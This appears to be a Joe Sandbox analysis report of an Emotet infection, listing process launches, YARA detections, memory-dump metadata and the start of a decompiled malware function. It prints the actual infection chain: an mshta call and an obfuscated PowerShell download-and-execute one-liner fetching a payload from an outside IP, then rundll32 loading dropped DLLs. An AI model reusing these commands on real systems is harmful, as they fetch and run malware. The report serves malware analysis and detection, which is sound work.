                                                                                                                        Imagebase:0x4a1a0000
                                                                                                                        File size:345088 bytes
                                                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:4
                                                                                                                        Start time:20:52:20
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:mshta http://91.240.118.168/zzx/ccv/fe.html
                                                                                                                        Imagebase:0x13f820000
                                                                                                                        File size:13824 bytes
                                                                                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:6
                                                                                                                        Start time:20:52:23
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                        Imagebase:0x13f280000
                                                                                                                        File size:473600 bytes
                                                                                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Reputation:high

                                                                                                                        Target ID:8
                                                                                                                        Start time:20:52:32
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                                                                                                                        Imagebase:0x4a980000
                                                                                                                        File size:345088 bytes
                                                                                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:9
                                                                                                                        Start time:20:52:33
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.447160166.0000000000760000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Target ID:10
                                                                                                                        Start time:20:52:36
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493631688.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493871437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493984139.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494455991.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494009099.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494267369.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493959169.0000000002341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494193723.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494121481.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494079905.00000000024F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493846362.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493927485.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494040925.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Target ID:11
                                                                                                                        Start time:20:52:55
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.496375881.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Target ID:12
                                                                                                                        Start time:20:52:59
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538520592.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538257691.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538139872.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538439653.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538498842.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538417405.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538540998.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538682957.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538459946.0000000000A21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538786600.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538736284.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538591662.0000000002821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538065858.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538366137.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Target ID:13
                                                                                                                        Start time:20:53:16
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.541336124.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.541752522.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.541212880.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        Target ID:15
                                                                                                                        Start time:20:53:20
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672831223.0000000002881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673078532.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672794567.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672749382.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672982289.0000000002B91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672961471.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673602256.0000000003660000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673105429.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673360837.0000000002F21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673205255.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673030786.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672529691.0000000000911000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672081662.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673507519.0000000002FF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672772312.0000000002761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673316318.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673391096.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673131902.0000000002D51000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672329422.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672931992.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673171132.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672613597.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672004438.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673263211.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673700095.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673435114.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672103586.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672388917.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673628550.0000000003691000.00000020.00000010.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction ID: ab9afe3a6105cb6c7cd1f1fd1f542081fee9a0b2967bdd3711c2d02a42d2920f
                                                                                                                          • Opcode Fuzzy Hash: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction Fuzzy Hash: BE51F42079CA484FCB88EB2C8849B31B7E1FB9D745F49C4EEE45AC7292DA24CC81C755
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E63000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction ID: ab9afe3a6105cb6c7cd1f1fd1f542081fee9a0b2967bdd3711c2d02a42d2920f
                                                                                                                          • Opcode Fuzzy Hash: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction Fuzzy Hash: BE51F42079CA484FCB88EB2C8849B31B7E1FB9D745F49C4EEE45AC7292DA24CC81C755
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction ID: b3967c3132f8bf11ceb7ae3bea12b062738981bafea561eb031d807d679c75c4
                                                                                                                          • Opcode Fuzzy Hash: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction Fuzzy Hash: 25D0226210C2C00FC30262B9140E06C7B52CA172C8338A0CBC48ADF082C8118D568363
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E63000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction ID: b3967c3132f8bf11ceb7ae3bea12b062738981bafea561eb031d807d679c75c4
                                                                                                                          • Opcode Fuzzy Hash: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction Fuzzy Hash: 25D0226210C2C00FC30262B9140E06C7B52CA172C8338A0CBC48ADF082C8118D568363
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.678176471.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.678176471.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.678176471.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:16.1%
                                                                                                                          Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                          Signature Coverage:21.9%
                                                                                                                          Total number of Nodes:297
                                                                                                                          Total number of Limit Nodes:23

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				short _v22;
                                                                                                                          				short _v24;
                                                                                                                          				short _v26;
                                                                                                                          				short _v28;
                                                                                                                          				short _v30;
                                                                                                                          				short _v32;
                                                                                                                          				short _v34;
                                                                                                                          				short _v36;
                                                                                                                          				short _v38;
                                                                                                                          				char _v40;
                                                                                                                          				void* _v44;
                                                                                                                          				void* _v48;
                                                                                                                          				long _v52;
                                                                                                                          				void* _v56;
                                                                                                                          				struct HRSRC__* _v60;
                                                                                                                          				short _v64;
                                                                                                                          				short _v66;
                                                                                                                          				short _v68;
                                                                                                                          				short _v70;
                                                                                                                          				short _v72;
                                                                                                                          				short _v74;
                                                                                                                          				short _v76;
                                                                                                                          				short _v78;
                                                                                                                          				short _v80;
                                                                                                                          				short _v82;
                                                                                                                          				short _v84;
                                                                                                                          				short _v86;
                                                                                                                          				char _v88;
                                                                                                                          				intOrPtr _v92;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t66;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t72;
                                                                                                                          				struct HRSRC__* _t74;
                                                                                                                          				void* _t78;
                                                                                                                          				intOrPtr _t92;
                                                                                                                          				void* _t93;
                                                                                                                          				void* _t95;
                                                                                                                          				intOrPtr _t104;
                                                                                                                          				signed int _t120;
                                                                                                                          				void* _t121;
                                                                                                                          
                                                                                                                          				_t119 = __esi;
                                                                                                                          				_t118 = __edi;
                                                                                                                          				_t96 = __ebx;
                                                                                                                          				_t66 =  *0x100545cc; // 0x986eb69
                                                                                                                          				_v20 = _t66 ^ _t120;
                                                                                                                          				_v92 = _a8;
                                                                                                                          				 *0x10055a80 = _a4;
                                                                                                                          				_t109 = _a8;
                                                                                                                          				 *0x10055a84 = _a8;
                                                                                                                          				 *0x10055a88 = _a12;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_v52 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_v48 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_t70 = E10006A90(__eflags); // executed
                                                                                                                          				_t131 = _t70;
                                                                                                                          				if(_t70 != 0) {
                                                                                                                          					_push(0x10046758);
                                                                                                                          					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                          					_t72 = 0;
                                                                                                                          				} else {
                                                                                                                          					 *0x100530b8 = 0;
